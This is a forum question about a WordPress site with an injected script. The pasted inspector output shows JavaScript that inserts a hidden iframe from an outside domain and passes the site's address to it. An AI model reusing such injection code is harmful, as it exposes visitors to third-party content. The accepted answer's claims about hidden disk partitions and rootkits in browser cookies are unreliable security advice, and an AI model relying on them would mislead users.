# Malicious script in Wordpress

Tags: javascript, wordpress

Hello I have a malicious script on my website and I just CAN NOT FIND IT anywhere !

I checked in the inspector, it returns this :

```
<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>

<script type="text/javascript">
    var relatedUrl = document.domain;
    var protocol = window.location.protocol;


    var idadv = document.createElement("iframe");
    with(idadv){
        id = "idadv";
        src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
        scrolling = "no";
    }   
    document.getElementById("menu-bar").appendChild(idadv);
</script>

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({
      trigger: $(".handle"),
      push: false,
      position: "right",
      width: 50,
      show: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
      },
      hidden: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
      },
    });

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div>
```

It is located in the "Menu-Bar" of my wordpress but I can not find anything anywhere ! And so that makes my website's SSL certificate showing my website as INSECURE to my clients ! I can not believe that !

Here is the URL : http://www.websiteladies.com

Any help ?

Answer (score 1, accepted):

I have had this problem myself and it may take hours to get rid of it.
It is going to be in JavaScript or jQuery format or VBS format, at least in part. It may have created its own partition at the top end of a HDD or external USB, so check your partitions.
 It would have attached part of itself to the registry so it knows when your searching for it, and it can repair itself as long as your online. It could have started as a root kit that attached itself to a text or photo file.
Try downloading Spybot SD, then go offline and install and run the program. If the virus created it's own partition you will have to find it and do a complete erase of that partition, then set it so it is an extension of the partition before it. A fast 'quick-clean' will not work, as it only cleans up sector markers.
 No antivirus or spybot tracker I know of will look in hidden partitions, but they can clean the registry and find hidden rootkits.
 Try to remember what you have recently downloaded and installed.
 Check any USB thumb-drives you have plugged in.
I would suggest staying offline until your sure all components of the virus are gone. I had one that hid some components *inside* an antivirus program.

Comment: Thanks for the information, it was a Chrome plugin ! Can't believe it !

Comment: @FrenchyNYC. Your welcome. It's a shame that Google Chrome is my favorite browser, but it is highly susceptible to JS based rootkits. A year ago I found 231 of them inside the 'cookie' jar. I now wipe the cache and cookie jar clean often, like once a week.